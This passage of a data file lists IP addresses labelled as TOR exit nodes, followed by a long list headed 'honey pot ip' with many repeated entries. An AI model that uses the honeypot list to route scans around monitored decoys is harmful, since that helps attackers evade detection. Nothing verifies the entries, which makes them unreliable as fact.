Nodes -195.22.126.178 # TOR Exit Nodes -195.228.45.176 # TOR Exit Nodes -195.254.135.76 # TOR Exit Nodes -196.41.123.180 # TOR Exit Nodes -196.54.55.14 # TOR Exit Nodes -197.231.221.211 # TOR Exit Nodes -198.100.148.112 # TOR Exit Nodes -198.167.223.38 # TOR Exit Nodes -198.211.122.191 # TOR Exit Nodes -198.245.60.8 # TOR Exit Nodes -198.46.138.18 # TOR Exit Nodes -198.50.159.155 # TOR Exit Nodes -198.50.159.204 # TOR Exit Nodes -198.50.200.129 # TOR Exit Nodes -198.50.200.131 # TOR Exit Nodes -198.50.200.134 # TOR Exit Nodes -198.50.200.135 # TOR Exit Nodes -198.50.200.147 # TOR Exit Nodes -198.58.100.240 # TOR Exit Nodes -198.58.107.53 # TOR Exit Nodes -198.73.50.71 # TOR Exit Nodes -198.96.155.3 # TOR Exit Nodes -199.127.226.150 # TOR Exit Nodes -199.249.223.40 # TOR Exit Nodes -199.249.223.41 # TOR Exit Nodes -199.249.223.42 # TOR Exit Nodes -199.249.223.43 # TOR Exit Nodes -199.249.223.44 # TOR Exit Nodes -199.249.223.45 # TOR Exit Nodes -199.249.223.46 # TOR Exit Nodes -199.249.223.47 # TOR Exit Nodes -199.249.223.48 # TOR Exit Nodes -199.249.223.49 # TOR Exit Nodes -199.249.223.60 # TOR Exit Nodes -199.249.223.61 # TOR Exit Nodes -199.249.223.62 # TOR Exit Nodes -199.249.223.63 # TOR Exit Nodes -199.249.223.64 # TOR Exit Nodes -199.249.223.65 # TOR Exit Nodes -199.249.223.66 # TOR Exit Nodes -199.249.223.67 # TOR Exit Nodes -199.249.223.68 # TOR Exit Nodes -199.249.223.69 # TOR Exit Nodes -199.249.223.71 # TOR Exit Nodes -199.249.223.72 # TOR Exit Nodes -199.249.223.73 # TOR Exit Nodes -199.249.223.74 # TOR Exit Nodes -199.249.223.75 # TOR Exit Nodes -199.249.223.76 # TOR Exit Nodes -199.249.223.77 # TOR Exit Nodes -199.249.223.78 # TOR Exit Nodes -199.249.223.79 # TOR Exit Nodes -199.249.223.81 # TOR Exit Nodes -199.249.224.40 # TOR Exit Nodes -199.249.224.41 # TOR Exit Nodes -199.249.224.42 # TOR Exit Nodes -199.249.224.43 # TOR Exit Nodes -199.249.224.44 # TOR Exit Nodes -199.249.224.45 # TOR Exit Nodes -199.249.224.46 # TOR Exit Nodes -199.249.224.47 # TOR Exit Nodes -199.249.224.48 # TOR Exit Nodes -199.249.224.49 # TOR Exit Nodes -199.249.224.60 # TOR Exit Nodes -199.249.224.61 # TOR Exit Nodes -199.249.224.62 # TOR Exit Nodes -199.249.224.63 # TOR Exit Nodes -199.249.224.64 # TOR Exit Nodes -199.249.224.65 # TOR Exit Nodes -199.249.224.66 # TOR Exit Nodes -199.249.224.67 # TOR Exit Nodes -199.249.224.68 # TOR Exit Nodes -199.249.224.69 # TOR Exit Nodes -199.68.196.124 # TOR Exit Nodes -199.87.154.255 # TOR Exit Nodes -2.238.18.141 # TOR Exit Nodes -203.88.136.199 # TOR Exit Nodes -204.11.50.131 # TOR Exit Nodes -204.194.29.4 # TOR Exit Nodes -204.8.156.142 # TOR Exit Nodes -204.85.191.30 # TOR Exit Nodes -204.85.191.31 # TOR Exit Nodes -205.166.94.153 # TOR Exit Nodes -205.168.84.133 # TOR Exit Nodes -206.55.74.0 # TOR Exit Nodes -207.154.238.204 # TOR Exit Nodes -207.244.70.35 # TOR Exit Nodes -208.67.1.79 # TOR Exit Nodes -208.67.1.83 # TOR Exit Nodes -208.94.110.37 # TOR Exit Nodes -209.123.234.23 # TOR Exit Nodes -210.3.102.152 # TOR Exit Nodes -210.50.9.88 # TOR Exit Nodes -211.21.48.217 # TOR Exit Nodes -212.16.104.33 # TOR Exit Nodes -212.19.17.213 # TOR Exit Nodes -212.21.66.6 # TOR Exit Nodes -212.47.229.60 # TOR Exit Nodes -212.47.239.73 # TOR Exit Nodes -212.47.243.140 # TOR Exit Nodes -212.47.246.21 # TOR Exit Nodes -212.81.199.159 # TOR Exit Nodes -212.83.40.239 # TOR Exit Nodes -212.92.219.15 # TOR Exit Nodes -213.108.105.71 # TOR Exit Nodes -213.108.105.92 # TOR Exit Nodes -213.61.149.100 # TOR Exit Nodes -213.95.21.54 # TOR Exit Nodes -216.218.134.12 # TOR Exit Nodes -216.218.222.11 # TOR Exit Nodes -216.218.222.12 # TOR Exit Nodes -216.239.90.19 # TOR Exit Nodes -217.115.10.131 # TOR Exit Nodes -217.170.197.83 # TOR Exit Nodes -217.182.207.27 # TOR Exit Nodes -217.182.74.253 # TOR Exit Nodes -217.182.76.240 # TOR Exit Nodes -217.182.78.177 # TOR Exit Nodes -217.197.81.19 # TOR Exit Nodes -220.227.48.213 # TOR Exit Nodes -222.110.3.1 # TOR Exit Nodes -223.26.48.248 # TOR Exit Nodes -23.129.64.11 # TOR Exit Nodes -23.129.64.12 # TOR Exit Nodes -23.129.64.13 # TOR Exit Nodes -23.129.64.14 # TOR Exit Nodes -23.129.64.15 # TOR Exit Nodes -23.83.238.245 # TOR Exit Nodes -23.92.27.23 # TOR Exit Nodes -23.92.28.23 # TOR Exit Nodes -24.207.212.154 # TOR Exit Nodes -24.27.178.106 # TOR Exit Nodes -31.179.151.198 # TOR Exit Nodes -31.185.104.19 # TOR Exit Nodes -31.185.104.20 # TOR Exit Nodes -31.185.104.21 # TOR Exit Nodes -31.185.27.208 # TOR Exit Nodes -31.220.111.120 # TOR Exit Nodes -35.184.106.64 # TOR Exit Nodes -35.193.100.176 # TOR Exit Nodes -36.227.161.175 # TOR Exit Nodes -37.139.8.104 # TOR Exit Nodes -37.187.129.166 # TOR Exit Nodes -37.187.53.94 # TOR Exit Nodes -37.187.7.74 # TOR Exit Nodes -37.218.240.21 # TOR Exit Nodes -37.218.240.50 # TOR Exit Nodes -37.218.240.68 # TOR Exit Nodes -37.218.240.80 # TOR Exit Nodes -37.220.35.202 # TOR Exit Nodes -37.220.36.240 # TOR Exit Nodes -37.48.120.196 # TOR Exit Nodes -37.59.101.176 # TOR Exit Nodes -37.59.112.7 # TOR Exit Nodes -37.59.116.170 # TOR Exit Nodes -37.59.119.196 # TOR Exit Nodes -37.97.228.159 # TOR Exit Nodes -41.100.127.24 # TOR Exit Nodes -41.100.95.92 # TOR Exit Nodes -41.103.213.190 # TOR Exit Nodes -41.206.188.206 # TOR Exit Nodes -41.78.128.113 # TOR Exit Nodes -45.33.23.23 # TOR Exit Nodes -45.33.48.204 # TOR Exit Nodes -45.35.72.85 # TOR Exit Nodes -45.62.236.66 # TOR Exit Nodes -45.62.251.245 # TOR Exit Nodes -45.76.115.159 # TOR Exit Nodes -45.79.137.11 # TOR Exit Nodes -45.79.144.222 # TOR Exit Nodes -45.79.198.115 # TOR Exit Nodes -45.79.208.219 # TOR Exit Nodes -45.79.73.22 # TOR Exit Nodes -45.79.85.112 # TOR Exit Nodes -46.101.127.145 # TOR Exit Nodes -46.101.139.248 # TOR Exit Nodes -46.101.150.49 # TOR Exit Nodes -46.101.164.37 # TOR Exit Nodes -46.165.230.5 # TOR Exit Nodes -46.165.254.166 # TOR Exit Nodes -46.17.97.112 # TOR Exit Nodes -46.182.106.190 # TOR Exit Nodes -46.182.18.214 # TOR Exit Nodes -46.182.18.40 # TOR Exit Nodes -46.182.18.46 # TOR Exit Nodes -46.182.19.15 # TOR Exit Nodes -46.182.19.219 # TOR Exit Nodes -46.183.218.199 # TOR Exit Nodes -46.194.136.3 # TOR Exit Nodes -46.194.23.204 # TOR Exit Nodes -46.226.108.26 # TOR Exit Nodes -46.233.0.70 # TOR Exit Nodes -46.235.227.70 # TOR Exit Nodes -46.246.35.71 # TOR Exit Nodes -46.246.35.72 # TOR Exit Nodes -46.246.35.81 # TOR Exit Nodes -46.246.49.100 # TOR Exit Nodes -46.246.49.106 # TOR Exit Nodes -46.246.49.186 # TOR Exit Nodes -46.29.248.238 # TOR Exit Nodes -46.4.55.177 # TOR Exit Nodes -46.4.77.210 # TOR Exit Nodes -46.4.81.178 # TOR Exit Nodes -46.72.103.95 # TOR Exit Nodes -46.72.118.182 # TOR Exit Nodes -46.72.66.220 # TOR Exit Nodes -46.72.77.67 # TOR Exit Nodes -46.98.198.16 # TOR Exit Nodes -46.98.198.232 # TOR Exit Nodes -46.98.199.228 # TOR Exit Nodes -46.98.199.45 # TOR Exit Nodes -46.98.200.204 # TOR Exit Nodes -46.98.201.202 # TOR Exit Nodes -46.98.205.117 # TOR Exit Nodes -46.98.205.60 # TOR Exit Nodes -46.98.206.9 # TOR Exit Nodes -46.98.207.186 # TOR Exit Nodes -49.50.108.240 # TOR Exit Nodes -5.164.205.245 # TOR Exit Nodes -5.165.66.7 # TOR Exit Nodes -5.165.79.216 # TOR Exit Nodes -5.188.11.165 # TOR Exit Nodes -5.189.146.133 # TOR Exit Nodes -5.189.188.111 # TOR Exit Nodes -5.196.0.149 # TOR Exit Nodes -5.196.1.129 # TOR Exit Nodes -5.196.121.161 # TOR Exit Nodes -5.196.29.217 # TOR Exit Nodes -5.196.66.162 # TOR Exit Nodes -5.199.130.188 # TOR Exit Nodes -5.254.112.154 # TOR Exit Nodes -5.254.79.66 # TOR Exit Nodes -5.39.217.14 # TOR Exit Nodes -5.56.214.118 # TOR Exit Nodes -5.9.195.140 # TOR Exit Nodes -50.247.195.124 # TOR Exit Nodes -50.76.159.218 # TOR Exit Nodes -51.15.134.120 # TOR Exit Nodes -51.15.141.220 # TOR Exit Nodes -51.15.196.158 # TOR Exit Nodes -51.15.199.104 # TOR Exit Nodes -51.15.212.104 # TOR Exit Nodes -51.15.217.56 # TOR Exit Nodes -51.15.34.210 # TOR Exit Nodes -51.15.34.214 # TOR Exit Nodes -51.15.40.233 # TOR Exit Nodes -51.15.43.205 # TOR Exit Nodes -51.15.43.232 # TOR Exit Nodes -51.15.44.197 # TOR Exit Nodes -51.15.45.97 # TOR Exit Nodes -51.15.46.115 # TOR Exit Nodes -51.15.46.49 # TOR Exit Nodes -51.15.50.133 # TOR Exit Nodes -51.15.53.118 # TOR Exit Nodes -51.15.53.83 # TOR Exit Nodes -51.15.54.136 # TOR Exit Nodes -51.15.56.11 # TOR Exit Nodes -51.15.57.177 # TOR Exit Nodes -51.15.57.79 # TOR Exit Nodes -51.15.60.255 # TOR Exit Nodes -51.15.60.62 # TOR Exit Nodes -51.15.62.146 # TOR Exit Nodes -51.15.63.229 # TOR Exit Nodes -51.15.63.98 # TOR Exit Nodes -51.15.64.212 # TOR Exit Nodes -51.15.70.13 # TOR Exit Nodes -51.15.70.226 # TOR Exit Nodes -51.15.70.228 # TOR Exit Nodes -51.15.71.118 # TOR Exit Nodes -51.15.72.53 # TOR Exit Nodes -51.15.73.182 # TOR Exit Nodes -51.15.76.81 # TOR Exit Nodes -51.15.79.107 # TOR Exit Nodes -51.15.8.100 # TOR Exit Nodes -51.15.84.183 # TOR Exit Nodes -51.15.87.157 # TOR Exit Nodes -51.255.202.66 # TOR Exit Nodes -54.36.81.57 # TOR Exit Nodes -59.127.163.155 # TOR Exit Nodes -60.248.162.179 # TOR Exit Nodes -61.228.92.249 # TOR Exit Nodes -62.102.148.67 # TOR Exit Nodes -62.12.115.107 # TOR Exit Nodes -62.133.130.105 # TOR Exit Nodes -62.141.39.47 # TOR Exit Nodes -62.149.12.153 # TOR Exit Nodes -62.176.4.10 # TOR Exit Nodes -62.198.32.223 # TOR Exit Nodes -62.210.105.116 # TOR Exit Nodes -62.210.105.86 # TOR Exit Nodes -62.210.129.246 # TOR Exit Nodes -62.210.37.82 # TOR Exit Nodes -62.212.73.141 # TOR Exit Nodes -62.219.3.47 # TOR Exit Nodes -62.219.3.48 # TOR Exit Nodes -62.235.222.192 # TOR Exit Nodes -64.113.32.29 # TOR Exit Nodes -64.124.32.84 # TOR Exit Nodes -64.137.162.142 # TOR Exit Nodes -64.137.205.124 # TOR Exit Nodes -64.137.210.30 # TOR Exit Nodes -64.27.17.140 # TOR Exit Nodes -65.129.144.43 # TOR Exit Nodes -65.181.123.254 # TOR Exit Nodes -65.19.167.130 # TOR Exit Nodes -65.19.167.131 # TOR Exit Nodes -65.19.167.132 # TOR Exit Nodes -66.110.216.10 # TOR Exit Nodes -66.155.4.213 # TOR Exit Nodes -66.180.193.219 # TOR Exit Nodes -66.220.3.179 # TOR Exit Nodes -67.205.146.164 # TOR Exit Nodes -67.215.255.140 # TOR Exit Nodes -69.162.107.5 # TOR Exit Nodes -69.164.207.234 # TOR Exit Nodes -71.46.220.68 # TOR Exit Nodes -72.12.207.14 # TOR Exit Nodes -72.14.179.10 # TOR Exit Nodes -72.14.182.209 # TOR Exit Nodes -72.204.193.71 # TOR Exit Nodes -72.210.252.137 # TOR Exit Nodes -72.221.196.141 # TOR Exit Nodes -72.52.75.27 # TOR Exit Nodes -72.93.243.211 # TOR Exit Nodes -74.142.74.156 # TOR Exit Nodes -74.252.14.154 # TOR Exit Nodes -74.50.54.69 # TOR Exit Nodes -75.54.229.204 # TOR Exit Nodes -77.191.12.176 # TOR Exit Nodes -77.191.19.135 # TOR Exit Nodes -77.191.24.100 # TOR Exit Nodes -77.246.163.141 # TOR Exit Nodes -77.247.181.162 # TOR Exit Nodes -77.250.227.12 # TOR Exit Nodes -77.81.107.138 # TOR Exit Nodes -77.81.247.72 # TOR Exit Nodes -78.107.237.16 # TOR Exit Nodes -78.109.23.1 # TOR Exit Nodes -78.129.137.28 # TOR Exit Nodes -78.13.203.226 # TOR Exit Nodes -78.13.238.7 # TOR Exit Nodes -78.142.175.70 # TOR Exit Nodes -78.21.52.58 # TOR Exit Nodes -78.31.164.41 # TOR Exit Nodes -78.46.50.7 # TOR Exit Nodes -78.70.167.74 # TOR Exit Nodes -78.84.240.48 # TOR Exit Nodes -79.137.79.167 # TOR Exit Nodes -79.137.80.94 # TOR Exit Nodes -79.172.193.32 # TOR Exit Nodes -79.199.245.10 # TOR Exit Nodes -79.199.255.156 # TOR Exit Nodes -79.78.147.142 # TOR Exit Nodes -80.209.252.72 # TOR Exit Nodes -80.241.60.207 # TOR Exit Nodes -80.67.172.162 # TOR Exit Nodes -80.73.242.142 # TOR Exit Nodes -80.79.23.7 # TOR Exit Nodes -80.82.67.166 # TOR Exit Nodes -80.82.67.186 # TOR Exit Nodes -80.85.84.23 # TOR Exit Nodes -81.171.19.32 # TOR Exit Nodes -82.146.58.35 # TOR Exit Nodes -82.165.100.196 # TOR Exit Nodes -82.165.142.79 # TOR Exit Nodes -82.221.112.122 # TOR Exit Nodes -82.221.128.217 # TOR Exit Nodes -82.221.139.190 # TOR Exit Nodes -82.221.139.25 # TOR Exit Nodes -82.223.27.82 # TOR Exit Nodes -82.247.198.227 # TOR Exit Nodes -83.134.133.198 # TOR Exit Nodes -83.92.47.99 # TOR Exit Nodes -84.105.18.164 # TOR Exit Nodes -84.17.21.50 # TOR Exit Nodes -84.19.181.25 # TOR Exit Nodes -84.190.181.254 # TOR Exit Nodes -84.200.50.18 # TOR Exit Nodes -84.200.82.163 # TOR Exit Nodes -84.209.48.106 # TOR Exit Nodes -84.217.13.138 # TOR Exit Nodes -84.3.10.87 # TOR Exit Nodes -84.42.239.35 # TOR Exit Nodes -84.42.239.36 # TOR Exit Nodes -84.48.199.78 # TOR Exit Nodes -84.53.192.243 # TOR Exit Nodes -84.53.225.118 # TOR Exit Nodes -85.195.107.250 # TOR Exit Nodes -85.248.227.163 # TOR Exit Nodes -85.248.227.165 # TOR Exit Nodes -85.90.244.23 # TOR Exit Nodes -85.93.218.204 # TOR Exit Nodes -86.149.159.224 # TOR Exit Nodes -86.149.159.8 # TOR Exit Nodes -87.118.115.176 # TOR Exit Nodes -87.118.116.12 # TOR Exit Nodes -87.118.116.90 # TOR Exit Nodes -87.118.122.201 # TOR Exit Nodes -87.118.122.254 # TOR Exit Nodes -87.118.122.30 # TOR Exit Nodes -87.118.122.50 # TOR Exit Nodes -87.118.123.191 # TOR Exit Nodes -87.118.82.3 # TOR Exit Nodes -87.118.92.43 # TOR Exit Nodes -87.118.94.2 # TOR Exit Nodes -87.120.254.130 # TOR Exit Nodes -87.180.235.230 # TOR Exit Nodes -87.180.238.160 # TOR Exit Nodes -87.180.239.118 # TOR Exit Nodes -87.81.148.61 # TOR Exit Nodes -87.98.178.61 # TOR Exit Nodes -88.198.125.96 # TOR Exit Nodes -88.76.29.216 # TOR Exit Nodes -88.77.195.36 # TOR Exit Nodes -88.77.211.4 # TOR Exit Nodes -88.83.40.246 # TOR Exit Nodes -89.144.12.15 # TOR Exit Nodes -89.163.155.202 # TOR Exit Nodes -89.187.150.12 # TOR Exit Nodes -89.187.150.13 # TOR Exit Nodes -89.187.150.14 # TOR Exit Nodes -89.187.150.15 # TOR Exit Nodes -89.207.129.150 # TOR Exit Nodes -89.212.99.66 # TOR Exit Nodes -89.234.157.254 # TOR Exit Nodes -89.236.34.117 # TOR Exit Nodes -89.248.166.157 # TOR Exit Nodes -89.31.57.5 # TOR Exit Nodes -89.31.96.168 # TOR Exit Nodes -89.34.237.226 # TOR Exit Nodes -89.38.208.57 # TOR Exit Nodes -89.45.226.28 # TOR Exit Nodes -91.117.98.197 # TOR Exit Nodes -91.121.52.156 # TOR Exit Nodes -91.122.52.9 # TOR Exit Nodes -91.134.232.48 # TOR Exit Nodes -91.138.253.244 # TOR Exit Nodes -91.146.121.3 # TOR Exit Nodes -91.219.236.232 # TOR Exit Nodes -91.219.237.244 # TOR Exit Nodes -91.221.57.129 # TOR Exit Nodes -91.233.106.121 # TOR Exit Nodes -91.233.117.81 # TOR Exit Nodes -91.244.10.34 # TOR Exit Nodes -92.111.156.14 # TOR Exit Nodes -92.169.87.4 # TOR Exit Nodes -92.222.207.227 # TOR Exit Nodes -92.222.6.12 # TOR Exit Nodes -92.222.74.226 # TOR Exit Nodes -92.63.173.28 # TOR Exit Nodes -92.87.236.230 # TOR Exit Nodes -93.115.95.201 # TOR Exit Nodes -93.115.95.202 # TOR Exit Nodes -93.115.95.204 # TOR Exit Nodes -93.115.95.205 # TOR Exit Nodes -93.115.95.206 # TOR Exit Nodes -93.115.95.207 # TOR Exit Nodes -93.123.73.123 # TOR Exit Nodes -93.174.93.133 # TOR Exit Nodes -93.174.93.71 # TOR Exit Nodes -93.188.162.188 # TOR Exit Nodes -93.64.207.55 # TOR Exit Nodes -93.88.74.140 # TOR Exit Nodes -94.102.50.42 # TOR Exit Nodes -94.130.28.151 # TOR Exit Nodes -94.142.242.84 # TOR Exit Nodes -94.156.77.83 # TOR Exit Nodes -94.177.123.116 # TOR Exit Nodes -94.198.100.17 # TOR Exit Nodes -94.23.201.80 # TOR Exit Nodes -94.23.239.44 # TOR Exit Nodes -94.242.205.2 # TOR Exit Nodes -94.242.57.161 # TOR Exit Nodes -94.242.57.2 # TOR Exit Nodes -94.248.3.184 # TOR Exit Nodes -94.248.36.241 # TOR Exit Nodes -94.248.40.132 # TOR Exit Nodes -94.34.7.140 # TOR Exit Nodes -95.128.43.164 # TOR Exit Nodes -95.130.11.170 # TOR Exit Nodes -95.130.12.12 # TOR Exit Nodes -95.130.9.210 # TOR Exit Nodes -95.211.118.194 # TOR Exit Nodes -95.211.230.94 # TOR Exit Nodes -95.215.44.194 # TOR Exit Nodes -95.249.94.233 # TOR Exit Nodes -95.79.145.72 # TOR Exit Nodes -96.255.14.191 # TOR Exit Nodes -96.64.149.101 # TOR Exit Nodes -97.74.237.196 # TOR Exit Nodes -98.174.90.43 # TOR Exit Nodes - -# honey pot ip -211.75.37.243 -104.199.235.62 -101.74.210.110 -103.36.90.58 -120.194.223.248 -221.226.83.53 -8.129.63.74 -47.92.138.122 -175.99.182.83 -218.94.26.10 -58.246.203.82 -116.7.73.242 -61.142.255.106 -119.1.169.5 -113.105.202.99 -113.16.175.170 -165.84.176.75 -120.77.252.54 -221.226.69.20 -61.178.77.17 -39.105.108.198 -116.7.75.145 -210.73.204.70 -122.228.157.34 -113.87.144.46 -103.36.90.58 -211.139.109.52 -139.196.45.156 -119.145.194.122 -122.224.175.75 -222.188.105.206 -222.72.47.38 -58.210.110.138 -103.36.90.58 -119.145.27.77 -112.91.150.102 -121.52.242.6 -218.77.12.141 -42.81.142.217 -103.36.90.58 -103.36.90.53 -219.87.147.153 -103.36.90.58 -47.97.77.93 -211.75.183.11 -58.56.229.26 -113.196.177.196 -180.167.145.166 -61.189.223.215 -124.115.247.88 -103.36.90.51 -103.36.90.49 -112.25.168.109 -210.59.240.196 -218.255.130.9 -120.79.9.73 -101.200.175.112 -221.226.194.17 -111.26.178.75 -120.68.178.9 -220.174.246.16 -111.26.178.69 -113.57.146.130 -202.102.25.154 -118.140.208.166 -218.24.163.157 -115.28.57.210 -61.221.141.21 -113.90.176.83 -39.98.89.207 -116.62.197.186 -210.12.113.66 -123.207.238.242 -123.56.126.109 -121.40.190.151 -202.99.122.156 -180.169.25.126 -39.100.4.75 -111.26.178.75 -111.26.178.69 -103.36.90.58 -124.128.8.187 -221.213.54.164 -1.12.239.55 -119.91.216.192 -219.142.75.20 -119.163.122.102 -202.121.16.22 -218.255.130.21 -115.238.180.165 -117.40.44.16 -115.28.32.40 -47.94.90.143 -103.36.90.58 -220.130.192.226 -120.27.236.100 -119.6.28.226 -36.27.214.150 -115.160.132.195 -45.121.52.114 -203.198.186.79 -139.219.105.52 -123.56.2.194 -104.155.224.221 -118.163.165.55 -116.62.115.246 -222.207.160.115 -111.44.219.14 -47.114.51.60 -118.31.103.155 -219.139.130.162 -61.184.78.105 -61.129.71.39 -121.199.52.122 -211.75.190.164 -61.129.71.40 -61.129.71.49 -113.108.203.238 -47.111.122.35 -39.129.11.213 -8.136.141.83 -106.12.241.13 -47.114.63.250 -218.242.168.130 -61.152.117.221 -125.215.40.34 -101.230.135.80 -39.108.114.246 -118.163.165.59 -221.224.125.235 -122.226.138.4 -116.62.59.6 -121.40.83.210 -222.207.160.112 -59.59.52.137 -121.8.145.133 -8.136.135.46 -202.199.225.11 -103.240.65.194 -61.152.117.106 -47.111.111.132 -120.26.128.118 -47.106.247.190 -47.99.76.131 -82.157.167.178 -61.152.117.231 -47.96.78.126 -113.214.14.66 -123.178.164.226 -221.224.125.234 -111.113.9.147 -222.207.160.113 -61.152.117.107 -110.186.229.223 -222.242.184.70 -103.36.90.58 -118.117.161.20 -47.103.147.248 -125.46.26.5 -211.149.182.53 -59.125.124.197 -121.40.242.26 -118.140.208.174 -220.128.243.94 -118.31.105.26 -47.99.146.139 -124.162.128.3 -61.152.117.224 -211.75.178.178 -113.204.227.35 -218.24.88.51 -182.123.224.249 -60.190.113.9 -118.140.17.206 -117.184.125.89 -125.62.8.102 -61.152.117.109 -210.51.190.239 -222.76.242.144 -220.241.69.7 -47.110.240.159 -47.93.58.178 -111.56.74.189 -218.76.35.181 -36.110.8.234 -47.106.222.46 -221.1.82.114 -218.76.35.187 -61.189.223.215 -101.34.102.77 -101.34.88.46 -103.36.90.62 -202.105.183.148 -218.89.52.93 -180.167.145.166 -121.5.42.122 -47.100.95.206 -60.205.204.107 -1.116.64.92 -182.42.63.80 -1.117.92.80 -123.57.87.184 -119.96.233.148 -121.37.24.101 -118.31.38.125 -110.53.23.147 -103.36.90.65 -121.89.204.199 -122.226.227.130 -120.202.66.121 -111.26.178.75 -39.105.223.222 -222.178.41.85 -111.26.178.69 -101.34.81.26 -103.36.90.54 -49.4.15.161 -110.42.136.19 -103.36.90.58 -116.228.150.138 -183.237.226.41 -47.94.34.18 -61.129.71.54 -113.106.76.93 -120.24.213.234 -39.99.134.56 -116.228.150.30 -124.71.208.217 -120.76.250.212 -221.123.135.37 -106.37.196.126 -61.136.148.133 -203.105.16.26 -221.7.151.135 -218.15.34.101 -122.146.19.238 -121.196.53.26 -122.146.19.139 -203.105.16.25 -103.36.90.60 -103.36.90.63 -182.92.0.178 -103.36.90.56 -43.240.92.10 -211.79.206.56 -43.240.92.13 -218.13.181.43 -117.149.228.4 -113.208.116.110 -211.79.206.92 -125.215.157.172 -118.31.105.26 -120.77.55.240 -47.99.243.233 -122.146.19.212 -114.55.178.157 -47.92.102.61 -121.42.145.75 -111.203.44.103 -43.240.92.8 -43.240.92.13 -43.240.92.9 -123.206.190.18 -122.146.19.139 -124.127.38.139 -219.216.227.78 -139.217.98.152 -139.196.168.204 -211.75.37.243 -125.46.26.42 -182.48.117.141 -114.55.53.129 -223.71.99.45 -203.71.232.71 -39.105.223.222 -121.40.152.195 -101.227.64.151 -39.105.138.226 -47.100.3.173 -124.162.128.59 -61.222.122.83 -139.196.18.36 -59.41.47.211 -106.120.69.2 -222.73.124.85 -222.199.52.66 -123.124.254.180 -123.124.254.203 -118.186.244.229 -125.89.62.198 -1.15.221.176 -47.99.201.98 -8.134.67.62 -39.97.236.50 -121.199.47.147 -39.99.247.27 -59.53.216.166 -218.69.106.206 -118.31.103.155 -47.102.41.117 -183.136.222.78 -121.8.254.107 -210.243.86.243 -219.218.55.140 -120.26.142.230 -193.112.100.71 -219.218.55.90 -47.102.139.88 -114.55.178.157 -42.247.44.132 -139.129.109.118 -60.190.238.102 -121.40.195.239 -47.103.140.216 -42.200.59.150 -120.27.51.160 -120.198.34.237 -61.220.144.2 -52.80.21.212 -120.26.121.85 -113.106.76.93 -222.73.228.198 -180.107.109.47 -8.131.234.179 -101.89.121.194 -35.234.9.155 -42.96.192.111 -52.83.173.205 -47.92.246.90 -222.35.252.210 -106.37.177.166 -202.134.87.11 -58.177.198.213 -118.31.105.26 -220.160.105.235 -121.42.28.163 -139.196.41.13 -119.146.237.220 -139.196.45.156 -223.197.242.81 -119.146.149.18 -47.92.153.60 -222.172.223.98 -106.15.204.30 -220.128.98.104 -210.177.175.171 -47.106.218.104 -103.36.90.53 -103.36.90.55 -219.148.25.99 -219.129.94.199 -221.230.33.81 -43.240.92.10 -43.240.92.12 -103.98.44.38 -103.36.90.58 -103.36.90.58 -139.196.54.102 -59.46.68.209 -218.75.196.188 -124.219.61.227 -104.155.232.67 -203.198.186.72 -54.223.169.254 -183.236.31.6 -116.228.180.158 -58.242.27.34 -120.26.199.26 -58.177.198.213 -121.196.53.26 -121.199.65.167 -183.134.76.187 -121.15.166.40 -218.247.4.202 -47.105.75.196 -122.189.200.139 -210.5.167.228 -104.199.235.62 -59.120.23.160 -103.36.90.63 -103.36.90.68 -103.36.90.57 -103.36.90.67 -103.36.90.61 -220.179.232.150 -103.36.90.66 -103.36.90.52 -103.36.90.56 -103.36.90.65 -103.36.90.46 -103.36.90.45 -103.36.90.50 -103.36.90.62 -103.36.90.71 -104.155.224.221 -103.36.90.60 -120.55.113.193 -47.115.49.158 -222.28.16.139 -120.24.75.157 -119.23.53.94 -123.103.13.168 -118.25.180.150 -47.114.82.37 -116.236.128.219 -202.82.221.213 -202.82.221.212 -202.82.221.211 -45.125.11.130 -45.125.11.99 -110.42.159.120 -218.75.206.109 -183.56.194.51 -103.235.232.61 -182.92.237.137 -202.103.149.10 -39.98.61.239 -103.36.90.64 -103.36.90.59 -103.36.90.58 -36.112.154.51 -124.88.68.205 -59.37.32.146 -47.95.168.149 -123.103.13.186 -182.92.0.178 -36.133.45.117 -221.123.191.214 -222.77.183.212 -119.97.130.44 -8.142.215.212 -124.160.109.135 -220.128.208.23 -106.55.52.161 -121.42.145.75 -175.98.127.170 -116.198.18.6 -120.27.152.145 -49.77.43.145 -203.156.196.75 -222.174.28.135 -112.54.44.17 -122.228.121.30 -183.62.101.131 -103.36.90.58 -183.240.87.132 -59.56.175.120 -103.36.90.58 -103.36.90.53 -111.17.220.105 -221.204.250.23 -113.89.233.118 -211.100.28.172 -113.200.57.223 -103.149.26.92 -219.232.102.57 -218.1.100.229 -218.92.2.88 -39.107.87.29 -119.97.227.205 -117.131.119.209 -113.246.243.144 -116.205.137.174 -121.15.166.45 -47.103.147.248 -219.129.94.173 -222.169.196.69 -47.104.193.42 -121.11.161.159 -8.142.42.12 -61.129.91.178 -101.227.181.12 -111.160.226.43 -58.247.134.2 -61.153.218.234 -47.114.121.62 -117.27.129.45 -47.104.193.42 -121.33.38.234 -183.240.87.132 -219.159.89.52 -103.36.90.58 -36.26.75.147 -101.74.210.126 -221.1.97.166 -106.12.240.28 -49.4.3.133 -61.182.134.115 -211.144.13.39 -47.91.243.112 -111.45.125.39 -221.178.192.200 -103.36.136.186 -103.36.90.58 -106.54.173.37 -119.44.222.237 -219.147.9.82 -221.178.192.196 -119.23.202.28 -103.36.90.57 -58.210.161.106 -116.24.189.168 -219.157.95.17 -183.234.151.242 -113.118.74.94 -103.36.90.58 -123.56.126.109 -103.36.90.58 -121.79.129.82 -103.36.90.58 -103.36.90.58 -121.40.83.210 -47.110.82.80 -183.59.159.122 -54.223.174.212 -103.36.90.58 -111.202.243.198 -120.27.152.145 -111.160.226.43 -103.36.90.58 -103.36.90.58 -45.125.11.99 -103.36.90.58 -219.139.148.2 -103.36.90.58 -219.76.7.58 -103.36.90.58 -112.54.44.17 -103.36.90.58 -221.226.115.6 -60.191.26.174 -58.220.232.9 -116.236.121.146 -103.36.90.58 -125.76.225.59 -218.198.32.202 -122.224.113.235 -121.10.21.227 -103.36.90.58 -183.240.86.124 -1.116.42.241 -221.226.69.20 -139.224.117.25 -61.189.223.215 -144.123.44.98 -103.36.90.58 -219.136.231.186 -47.101.62.47 -103.36.90.58 -103.36.90.58 -103.36.90.58 -125.71.215.174 -120.204.247.158 -103.36.90.59 -116.7.74.242 -116.7.74.121 -112.51.3.162 -103.36.90.58 -202.153.114.250 -220.180.184.66 -47.112.75.114 -121.34.48.117 -113.106.22.37 -219.139.35.84 -183.63.167.163 -121.40.83.210 -115.29.206.139 -183.60.143.121 -103.36.90.58 -121.40.83.210 -210.5.167.228 -183.63.11.202 -47.93.119.234 -210.13.125.5 